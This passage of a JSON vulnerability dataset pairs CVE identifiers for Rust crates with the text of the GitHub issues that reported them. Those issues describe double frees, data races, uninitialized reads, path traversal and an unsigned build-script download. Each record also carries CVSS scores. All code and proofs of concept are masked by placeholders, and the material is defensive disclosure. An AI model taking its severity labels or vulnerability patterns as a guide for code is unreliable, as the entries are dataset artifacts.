  84977. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84978. "severity": "CRITICAL",
  84979. "baseScore": 9.8,
  84980. "impactScore": 5.9,
  84981. "exploitabilityScore": 3.9
  84982. },
  84983. {
  84984. "CVE_ID": "CVE-2020-35883",
  84985. "Issue_Url_old": "https://github.com/NilsIrl/MozWire/issues/14",
  84986. "Issue_Url_new": "https://github.com/nilsirl/mozwire/issues/14",
  84987. "Repo_new": "nilsirl/mozwire",
  84988. "Issue_Created_At": "2020-08-18T11:14:10Z",
  84989. "description": "hostname from server may be trusted without check and used in file path. I tried to read through the code prior to using it, and here: URLTAG The APITAG variable is used, as far as I can tell from the source code this value comes directly from the server and there are no checks to verify that it doesn't contain something that might cause a path traversal (i.e. ../ ). I have not verified this in any way, as it was annoying to untangle the oauth things in front of it. It also feels like a very low risk vulnerability, as the software is hardcoded to go against the mozilla servers.",
  84990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  84991. "severity": "CRITICAL",
  84992. "baseScore": 9.1,
  84993. "impactScore": 5.2,
  84994. "exploitabilityScore": 3.9
  84995. },
  84996. {
  84997. "CVE_ID": "CVE-2021-38188",
  84998. "Issue_Url_old": "https://github.com/icedland/iced/issues/168",
  84999. "Issue_Url_new": "https://github.com/icedland/iced/issues/168",
  85000. "Repo_new": "icedland/iced",
  85001. "Issue_Created_At": "2021-05-19T04:00:03Z",
  85002. "description": "APITAG advisory for versions prior to NUMBERTAG I was running Miri on my project and saw a curious violation: ERRORTAG Per the Rust docs for ERRORTAG URLTAG : APITAG this method with an out of bounds index is undefined behavior even if the resulting reference is not used. Full code context: URLTAG It looks like this code was changed in URLTAG and no longer contains a call to ERRORTAG . I'm mostly submitting this issue as an FYI, but IMO a FILETAG should be published for versions prior to this fix to prevent undefined behavior in Rust applications consuming this library. If you agree I'd be happy to submit the advisory.",
  85003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85004. "severity": "CRITICAL",
  85005. "baseScore": 9.8,
  85006. "impactScore": 5.9,
  85007. "exploitabilityScore": 3.9
  85008. },
  85009. {
  85010. "CVE_ID": "CVE-2020-35907",
  85011. "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2091",
  85012. "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2091",
  85013. "Repo_new": "rust-lang/futures-rs",
  85014. "Issue_Created_At": "2020-03-03T22:32:02Z",
  85015. "description": "noop_waker_ref is unsound. Demo URLTAG which segfaults in playground: ERRORTAG APITAG returns a APITAG reference into TLS, but Waker is Sync so APITAG is Send , allowing the reference to outlive the thread it came from. It should use something more like a lazy_static.",
  85016. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85017. "severity": "MEDIUM",
  85018. "baseScore": 5.5,
  85019. "impactScore": 3.6,
  85020. "exploitabilityScore": 1.8
  85021. },
  85022. {
  85023. "CVE_ID": "CVE-2019-16137",
  85024. "Issue_Url_old": "https://github.com/mvdnes/spin-rs/issues/65",
  85025. "Issue_Url_new": "https://github.com/mvdnes/spin-rs/issues/65",
  85026. "Repo_new": "mvdnes/spin-rs",
  85027. "Issue_Created_At": "2019-06-27T17:55:17Z",
  85028. "description": "Buggy Drop impl for APITAG and issues in APITAG . Multiple issues in the APITAG implementation. The first (and the worst) one is here: CODETAG Use of APITAG is incorrect. The compiler is free to reorder a write behind this, which could lead to two mutable refs being used at the same time (UB). It should be APITAG instead (maybe this was just a typo?). Other parts of this code use the needlessly strict APITAG ordering, but that's not a soundness issue. The second that I've found is a bug in the APITAG function: ERRORTAG The problem is that a different thread could increment the readers count on the indicated line, making the value that the CAS checks for incorrect it might fail even if there are no writers at all. For example: ERRORTAG This code panics for me, even though there are no writers so APITAG should always succeed. To be frank, I think it would be better to simply rewrite this whole implementation. The original blog that this was implemented from uses the writers bit to allow for recursive write locking (which this crate doesn't) I see no reason not to just use some sentinel value like NUMBERTAG to indicate a writer is holding the lock.",
  85029. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85030. "severity": "HIGH",
  85031. "baseScore": 7.5,
  85032. "impactScore": 3.6,
  85033. "exploitabilityScore": 3.9
  85034. },
  85035. {
  85036. "CVE_ID": "CVE-2021-28029",
  85037. "Issue_Url_old": "https://github.com/antonmarsden/toodee/issues/13",
  85038. "Issue_Url_new": "https://github.com/antonmarsden/toodee/issues/13",
  85039. "Repo_new": "antonmarsden/toodee",
  85040. "Issue_Created_At": "2021-02-19T06:04:42Z",
  85041. "description": "Panic Safety and soundness issue in insert_row. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG function: URLTAG During this part, the elements are shifted over which can potentially duplicate them. After this, for e in iter is called which can potentially panic. If this occurs, the duplicated elements can be dropped twice leading to a double free, see this example: ERRORTAG This outputs: CODETAG Secondly, the function reserves space based on the APITAG provided by APITAG . However, this trait shouldn't be trusted in unsafe code and can potentially lead to issues such as using undefined memory when it is implemented incorrectly like so: ERRORTAG This outputs: APITAG",
  85042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85043. "severity": "HIGH",
  85044. "baseScore": 7.5,
  85045. "impactScore": 3.6,
  85046. "exploitabilityScore": 3.9
  85047. },
  85048. {
  85049. "CVE_ID": "CVE-2021-28036",
  85050. "Issue_Url_old": "https://github.com/quinn-rs/quinn/issues/968",
  85051. "Issue_Url_new": "https://github.com/quinn-rs/quinn/issues/968",
  85052. "Repo_new": "quinn-rs/quinn",
  85053. "Issue_Created_At": "2021-01-04T21:30:40Z",
  85054. "description": "Invalid assumption about APITAG layout. It looks like we're assuming that APITAG matches the libc APITAG (same for IP NUMBERTAG for example in URLTAG However, the standard library never guaranteed this, and in fact is looking at changing this in URLTAG We should fix our usage.",
  85055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85056. "severity": "HIGH",
  85057. "baseScore": 7.5,
  85058. "impactScore": 3.6,
  85059. "exploitabilityScore": 3.9
  85060. },
  85061. {
  85062. "CVE_ID": "CVE-2020-36464",
  85063. "Issue_Url_old": "https://github.com/japaric/heapless/issues/181",
  85064. "Issue_Url_new": "https://github.com/japaric/heapless/issues/181",
  85065. "Repo_new": "japaric/heapless",
  85066. "Issue_Created_At": "2020-11-02T17:48:11Z",
  85067. "description": "Unsoundness in APITAG APITAG 's Clone implementation clones the entire inner Vec. If the iterator has been partially consumed, only the non consumed items should be cloned. The following code demonstrates the issue: ERRORTAG This outputs CODETAG After APITAG is popped from the iterator, cloning the iterator will still clone the \"dead\" APITAG . Only APITAG and APITAG should be cloned.",
  85068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85069. "severity": "HIGH",
  85070. "baseScore": 7.5,
  85071. "impactScore": 3.6,
  85072. "exploitabilityScore": 3.9
  85073. },
  85074. {
  85075. "CVE_ID": "CVE-2020-36209",
  85076. "Issue_Url_old": "https://github.com/Richard-W/late-static/issues/1",
  85077. "Issue_Url_new": "https://github.com/richard-w/late-static/issues/1",
  85078. "Repo_new": "richard-w/late-static",
  85079. "Issue_Created_At": "2020-11-10T20:58:02Z",
  85080. "description": "APITAG Currently APITAG implements Send and Sync unconditionally for all types. URLTAG This should probably only be for Sync types otherwise there is a soundness issue for multithreaded programs. It is possible to wrap a type that isn't safe to use across threads like Cell in a APITAG and then cause data races like so: ERRORTAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
  85081. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85082. "severity": "HIGH",
  85083. "baseScore": 7.0,
  85084. "impactScore": 5.9,
  85085. "exploitabilityScore": 1.0
  85086. },
  85087. {
  85088. "CVE_ID": "CVE-2020-36450",
  85089. "Issue_Url_old": "https://github.com/krl/bunch/issues/1",
  85090. "Issue_Url_new": "https://github.com/krl/bunch/issues/1",
  85091. "Repo_new": "krl/bunch",
  85092. "Issue_Created_At": "2020-11-12T12:43:54Z",
  85093. "description": "APITAG need a Sync bound on T. Hello :crab: , Currently in the Sync impl for APITAG , there is no Sync bound on T . With that, it's possible to write code that causes undefined behavior when Bunch is used from multiple threads. URLTAG Below is a small & contrived proof of concept, where a segmentation fault can occur due to data race. Running the example code below in Debug mode results in a segmentation fault. ERRORTAG I think this issue can be resolved by adding a APITAG bound to ERRORTAG . APITAG found by APITAG gatech's Rust group)",
  85094. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85095. "severity": "HIGH",
  85096. "baseScore": 8.1,
  85097. "impactScore": 5.9,
  85098. "exploitabilityScore": 2.2
  85099. },
  85100. {
  85101. "CVE_ID": "CVE-2020-35908",
  85102. "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2050",
  85103. "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2050",
  85104. "Repo_new": "rust-lang/futures-rs",
  85105. "Issue_Created_At": "2020-01-24T23:00:47Z",
  85106. "description": "APITAG has an incorrect Sync impl. ERRORTAG switched to using Cell for interior mutability of the len and APITAG fields in APITAG but it still currently retains a Sync implementation. Since there isn't any synchronization performed when these fields are modified when calling the push method, the Sync implementation is invalid and should be dropped. It looks like this was mentioned in NUMBERTAG but was overlooked in the actual commit.",
  85107. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85108. "severity": "MEDIUM",
  85109. "baseScore": 5.5,
  85110. "impactScore": 3.6,
  85111. "exploitabilityScore": 1.8
  85112. },
  85113. {
  85114. "CVE_ID": "CVE-2020-36447",
  85115. "Issue_Url_old": "https://github.com/purpleposeidon/v9/issues/1",
  85116. "Issue_Url_new": "https://github.com/purpleposeidon/v9/issues/1",
  85117. "Repo_new": "purpleposeidon/v9",
  85118. "Issue_Created_At": "2020-12-18T22:13:26Z",
  85119. "description": "APITAG APITAG and APITAG allow data races. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG 's Sync implementation doesn't impose Sync bound on T . This definition allows data races if APITAG is accessible through APITAG . APITAG derives Clone and Debug , and the default implementations of those traits access APITAG in such a way. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of APITAG . APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate NUMBERTAG ersion NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG APITAG APITAG",
  85120. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85121. "severity": "HIGH",
  85122. "baseScore": 8.1,
  85123. "impactScore": 5.9,
  85124. "exploitabilityScore": 2.2
  85125. },
  85126. {
  85127. "CVE_ID": "CVE-2016-10933",
  85128. "Issue_Url_old": "https://github.com/RustAudio/rust-portaudio/issues/144",
  85129. "Issue_Url_new": "https://github.com/rustaudio/rust-portaudio/issues/144",
  85130. "Repo_new": "rustaudio/rust-portaudio",
  85131. "Issue_Created_At": "2016-08-21T10:57:05Z",
  85132. "description": "Vulnerable build script APITAG on network can make it execute arbitrary code). Build script attempts to download portaudio code through plain http and without any signature checking (because there aren't any) and then run it. URLTAG URLTAG That's of course portaudio team's fault. But it's possible to download portaudio code from git as a safer alternative \u2014 URLTAG I think, rust portaudio should use this safer way to download code.",
  85133. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85134. "severity": "MEDIUM",
  85135. "baseScore": 5.9,
  85136. "impactScore": 3.6,
  85137. "exploitabilityScore": 2.2
  85138. },
  85139. {
  85140. "CVE_ID": "CVE-2020-36433",
  85141. "Issue_Url_old": "https://github.com/aeplay/chunky/issues/2",
  85142. "Issue_Url_new": "https://github.com/aeplay/chunky/issues/2",
  85143. "Repo_new": "aeplay/chunky",
  85144. "Issue_Created_At": "2020-08-26T02:31:37Z",
  85145. "description": "Chunk API does not respect align requirement. URLTAG Description Chunk API does not respect the align requirement of types. Unaligned reference can be created with the API, which is an undefined behavior. Demonstration Crate: chunky Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly (bf NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85147. "severity": "HIGH",
  85148. "baseScore": 7.5,
  85149. "impactScore": 3.6,
  85150. "exploitabilityScore": 3.9
  85151. },
  85152. {
  85153. "CVE_ID": "CVE-2021-26305",
  85154. "Issue_Url_old": "https://github.com/hrektts/cdr-rs/issues/10",
  85155. "Issue_Url_new": "https://github.com/hrektts/cdr-rs/issues/10",
  85156. "Repo_new": "hrektts/cdr-rs",
  85157. "Issue_Created_At": "2021-01-02T22:58:43Z",
  85158. "description": "Reading uninitialized memory can cause UB ( APITAG ). Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation ( APITAG ). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). Suggested Fix It is safe to zero initialize the newly allocated part of APITAG buffer before APITAG in order to prevent user provided Read from getting access to the old contents from the newly allocated heap memory. Thank you for checking out this issue NUMBERTAG",
  85159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85160. "severity": "CRITICAL",
  85161. "baseScore": 9.8,
  85162. "impactScore": 5.9,
  85163. "exploitabilityScore": 3.9
  85164. },
  85165. {
  85166. "CVE_ID": "CVE-2020-35905",
  85167. "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2239",
  85168. "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2239",
  85169. "Repo_new": "rust-lang/futures-rs",
  85170. "Issue_Created_At": "2020-10-23T08:54:50Z",
  85171. "description": "APITAG APITAG bound is unsound. Hello, we have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior while scanning crates.io. URLTAG Description APITAG implementation for APITAG only considers variance on T, while APITAG dereferences to U. This can lead to data race in safe Rust code when a closure used in APITAG returns U that is unrelated to T. Demonstration Crate: futures Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG bf6b4f NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85172. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85173. "severity": "MEDIUM",
  85174. "baseScore": 4.7,
  85175. "impactScore": 3.6,
  85176. "exploitabilityScore": 1.0
  85177. },
  85178. {
  85179. "CVE_ID": "CVE-2021-28034",
  85180. "Issue_Url_old": "https://github.com/thepowersgang/stack_dst-rs/issues/5",
  85181. "Issue_Url_new": "https://github.com/thepowersgang/stack_dst-rs/issues/5",
  85182. "Repo_new": "thepowersgang/stack_dst-rs",
  85183. "Issue_Created_At": "2021-02-22T18:15:33Z",
  85184. "description": "push_cloned may drop uninitialized or double free if clone panics.. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG function: URLTAG The APITAG function increases the length of the stack, but between the element being written and this increased length the APITAG function is called which can leave the stack in a longer state but missing an element. Here's a simple demonstration of this issue: ERRORTAG This outputs: CODETAG Notice that APITAG is printed twice, indicating a double free.",
  85185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85186. "severity": "CRITICAL",
  85187. "baseScore": 9.8,
  85188. "impactScore": 5.9,
  85189. "exploitabilityScore": 3.9
  85190. },
  85191. {
  85192. "CVE_ID": "CVE-2021-26955",
  85193. "Issue_Url_old": "https://github.com/RustSec/advisory-db/issues/653",
  85194. "Issue_Url_new": "https://github.com/rustsec/advisory-db/issues/653",
  85195. "Repo_new": "rustsec/advisory-db",
  85196. "Issue_Created_At": "2021-01-23T16:27:12Z",
  85197. "description": "xcb is unsound and unmaintained. Following up from URLTAG the following issues are currently outstanding in the xcb crate: interpret some bytes coming from the NUMBERTAG server as any type you like: rtbo/rust xcb NUMBERTAG URLTAG Out of bounds read for sending bytes to the server: rtbo/rust xcb NUMBERTAG URLTAG a \"safe\" version of APITAG (with some limits on the types, but not enough): rtbo/rust xcb NUMBERTAG URLTAG The README states: > Maintainance request > > I've been very happy to work on this project, but I don't have the possibility anymore to maintain these bindings to the level the Rust community deserves. I can't spend as much time on it as I used to, and I'm not using neither Rust nor XCB anymore, so I clearly can't improve the bindings with the latest Rust features. Person with motivation and good knowledge of Rust and XCB may contact me per email.",
  85198. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85199. "severity": "CRITICAL",
  85200. "baseScore": 9.8,
  85201. "impactScore": 5.9,
  85202. "exploitabilityScore": 3.9
  85203. },
  85204. {
  85205. "CVE_ID": "CVE-2021-26955",
  85206. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/78",
  85207. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/78",
  85208. "Repo_new": "rust-x-bindings/rust-xcb",
  85209. "Issue_Created_At": "2020-04-11T02:22:44Z",
  85210. "description": "Make APITAG unsafe. ERRORTAG This is the code for APITAG . Safe functions should (almost?) always be safe, no matter their arguments. My suggested fix is to change it to ERRORTAG This signals to callers that they have to be careful when calling cast_event.",
  85211. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85212. "severity": "CRITICAL",
  85213. "baseScore": 9.8,
  85214. "impactScore": 5.9,
  85215. "exploitabilityScore": 3.9
  85216. },
  85217. {
  85218. "CVE_ID": "CVE-2021-26955",
  85219. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/94",
  85220. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/94",
  85221. "Repo_new": "rust-x-bindings/rust-xcb",
  85222. "Issue_Created_At": "2020-12-21T20:51:55Z",
  85223. "description": "Undefined behaviour in xproto::change_property. APITAG takes the arguments APITAG and a APITAG . The currently generated code ERRORTAG does not check for the case APITAG , so a user could do something like this: APITAG APITAG will assume to get NUMBERTAG bits of data in APITAG , but instead gets only NUMBERTAG bits. Reading the last NUMBERTAG bytes from APITAG would cause UB. Also it is not desirable to get types, that are bigger than format . We could make APITAG unsafe or APITAG in the case of APITAG . Another option would be to only allow APITAG , APITAG and APITAG , since other formats are not allowed by APITAG . ERRORTAG",
  85224. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85225. "severity": "CRITICAL",
  85226. "baseScore": 9.8,
  85227. "impactScore": 5.9,
  85228. "exploitabilityScore": 3.9
  85229. },
  85230. {
  85231. "CVE_ID": "CVE-2021-26955",
  85232. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/95",
  85233. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/95",
  85234. "Repo_new": "rust-x-bindings/rust-xcb",
  85235. "Issue_Created_At": "2021-01-23T06:39:05Z",
  85236. "description": "APITAG is unsound. The below is pure unsoundness. The caller can specify any type they like. How about bool or an enum? Or something with a pointer like Vec or String or APITAG for extra memory fun? Edit: To explain this some more: A bool is either NUMBERTAG or NUMBERTAG If a variable of type bool contains any other value, that's undefined behaviour aka \"that must not happen\". ERRORTAG",
  85237. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85238. "severity": "CRITICAL",
  85239. "baseScore": 9.8,
  85240. "impactScore": 5.9,
  85241. "exploitabilityScore": 3.9
  85242. },
  85243. {
  85244. "CVE_ID": "CVE-2021-26955",
  85245. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/96",
  85246. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/96",
  85247. "Repo_new": "rust-x-bindings/rust-xcb",
  85248. "Issue_Created_At": "2021-01-23T09:10:43Z",
  85249. "description": "Creates a string from unvalidated utf8. I have no words: ERRORTAG",
  85250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85251. "severity": "CRITICAL",
  85252. "baseScore": 9.8,
  85253. "impactScore": 5.9,
  85254. "exploitabilityScore": 3.9
  85255. },
  85256. {
  85257. "CVE_ID": "CVE-2020-36469",
  85258. "Issue_Url_old": "https://github.com/krl/appendix/issues/6",
  85259. "Issue_Url_new": "https://github.com/krl/appendix/issues/6",
  85260. "Repo_new": "krl/appendix",
  85261. "Issue_Created_At": "2020-11-15T05:31:26Z",
  85262. "description": "Index should have its Send and Sync traits be bounded.. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Index object implements the Send and Sync traits for all types: URLTAG This should likely be bounded when both K and V are Send and Sync respectively, otherwise it makes it possible to send an Index object across threads containing non Sendable types such as an Rc object or a Cell .",
  85263. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85264. "severity": "MEDIUM",
  85265. "baseScore": 5.9,
  85266. "impactScore": 3.6,
  85267. "exploitabilityScore": 2.2
  85268. },
  85269. {
  85270. "CVE_ID": "CVE-2021-29934",
  85271. "Issue_Url_old": "https://github.com/uutils/coreutils/issues/1729",
  85272. "Issue_Url_new": "https://github.com/uutils/coreutils/issues/1729",
  85273. "Repo_new": "uutils/coreutils",
  85274. "Issue_Created_At": "2021-02-18T01:57:22Z",
  85275. "description": "Read on uninitialized buffer may cause UB ('uu_od' crate). Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Feb NUMBERTAG there is not yet an ideal fix that works with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Rust RFC NUMBERTAG URLTAG Discussion in Rust Internals Forum URLTAG",
  85276. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  85277. "severity": "HIGH",
  85278. "baseScore": 7.3,
  85279. "impactScore": 3.4,
  85280. "exploitabilityScore": 3.9
  85281. },
  85282. {
  85283. "CVE_ID": "CVE-2021-28030",
  85284. "Issue_Url_old": "https://github.com/bodoni/truetype/issues/11",
  85285. "Issue_Url_new": "https://github.com/bodoni/truetype/issues/11",
  85286. "Repo_new": "bodoni/truetype",
  85287. "Issue_Created_At": "2021-02-17T20:07:48Z",
  85288. "description": "Custom Read on uninitialized buffer may cause UB. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Feb NUMBERTAG there is not yet an ideal fix that works with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Rust RFC NUMBERTAG URLTAG Discussion in Rust Internals Forum URLTAG",
  85289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85290. "severity": "HIGH",
  85291. "baseScore": 7.5,
  85292. "impactScore": 3.6,
  85293. "exploitabilityScore": 3.9
  85294. },
  85295. {
  85296. "CVE_ID": "CVE-2021-27376",
  85297. "Issue_Url_old": "https://github.com/smol-rs/nb-connect/issues/1",
  85298. "Issue_Url_new": "https://github.com/smol-rs/nb-connect/issues/1",
  85299. "Repo_new": "smol-rs/nb-connect",
  85300. "Issue_Created_At": "2020-12-15T11:18:00Z",
  85301. "description": "Invalid assumption of APITAG layout. This code assumes that Rust's APITAG are layout compatible with sockaddr : URLTAG This is not guaranteed by the standard library, see URLTAG for more details.",
  85302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85303. "severity": "CRITICAL",
  85304. "baseScore": 9.8,
  85305. "impactScore": 5.9,
  85306. "exploitabilityScore": 3.9
  85307. },
  85308. {
  85309. "CVE_ID": "CVE-2021-28031",
  85310. "Issue_Url_old": "https://github.com/okready/scratchpad/issues/1",
  85311. "Issue_Url_new": "https://github.com/okready/scratchpad/issues/1",
  85312. "Repo_new": "okready/scratchpad",
  85313. "Issue_Created_At": "2021-02-18T19:44:32Z",
  85314. "description": "panic safety: double drop may happen in two functions. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Two functions allow double drop of an object upon panic: APITAG , APITAG . Both functions take user provided closure as parameter, and a double drop of an object happens upon panic inside the user provided closure. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of scratchpad . APITAG Detail APITAG APITAG struct Foo is dropped twice upon panic in user provided closure. ERRORTAG Output: ERRORTAG Tested Environment Crate: scratchpad Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  85315. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85316. "severity": "CRITICAL",
  85317. "baseScore": 9.8,
  85318. "impactScore": 5.9,
  85319. "exploitabilityScore": 3.9
  85320. },
  85321. {
  85322. "CVE_ID": "CVE-2020-35858",
  85323. "Issue_Url_old": "https://github.com/danburkert/prost/issues/267",
  85324. "Issue_Url_new": "https://github.com/danburkert/prost/issues/267",
  85325. "Repo_new": "danburkert/prost",
  85326. "Issue_Created_At": "2020-01-16T11:10:21Z",
  85327. "description": "Stack overflow when parsing message. When parsing certain messages, the process aborts with a stack overflow. I made a reproducer URLTAG : ERRORTAG Potentially the data requests allocation of a buffer that's larger than the actually available data NUMBERTAG APITAG input data is not that large...) APITAG through FILETAG",
  85328. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85329. "severity": "CRITICAL",
  85330. "baseScore": 9.8,
  85331. "impactScore": 5.9,
  85332. "exploitabilityScore": 3.9
  85333. },
  85334. {
  85335. "CVE_ID": "CVE-2021-29930",
  85336. "Issue_Url_old": "https://github.com/ibabushkin/arenavec/issues/1",
  85337. "Issue_Url_new": "https://github.com/ibabushkin/arenavec/issues/1",
  85338. "Repo_new": "ibabushkin/arenavec",
  85339. "Issue_Created_At": "2021-01-12T14:49:59Z",
  85340. "description": "double free error may happen in NUMBERTAG functions. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG Drop uninitialized memory upon panic within APITAG . URLTAG APITAG double free upon panic within APITAG in line NUMBERTAG URLTAG APITAG double free upon panic within APITAG in line NUMBERTAG URLTAG Proof of Concept Example program below exhibits a double drop on the same object. ERRORTAG Program Output The message APITAG is printed twice, indicating the same object was dropped twice. ERRORTAG Suggested Fix APITAG : Move APITAG to after all writes are done. APITAG & APITAG : Move APITAG to before APITAG . Thank you for checking out this issue!",
  85341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85342. "severity": "HIGH",
  85343. "baseScore": 7.5,
  85344. "impactScore": 3.6,
  85345. "exploitabilityScore": 3.9
  85346. },
  85347. {
  85348. "CVE_ID": "CVE-2020-35892",
  85349. "Issue_Url_old": "https://github.com/nathansizemore/simple-slab/issues/2",
  85350. "Issue_Url_new": "https://github.com/nathansizemore/simple-slab/issues/2",
  85351. "Repo_new": "nathansizemore/simple-slab",
  85352. "Issue_Created_At": "2020-09-04T03:55:57Z",
  85353. "description": "APITAG allows out of bound read and APITAG has off by one error. Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. URLTAG URLTAG Description APITAG does not perform the boundary checking, which leads to out of bound read access. APITAG copies an element from an invalid address due to off by one error, resulting in memory leakage and uninitialized memory drop. Demonstration Crate: simple slab Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  85355. "severity": "CRITICAL",
  85356. "baseScore": 9.1,
  85357. "impactScore": 5.2,
  85358. "exploitabilityScore": 3.9
  85359. },
  85360. {
  85361. "CVE_ID": "CVE-2020-36457",
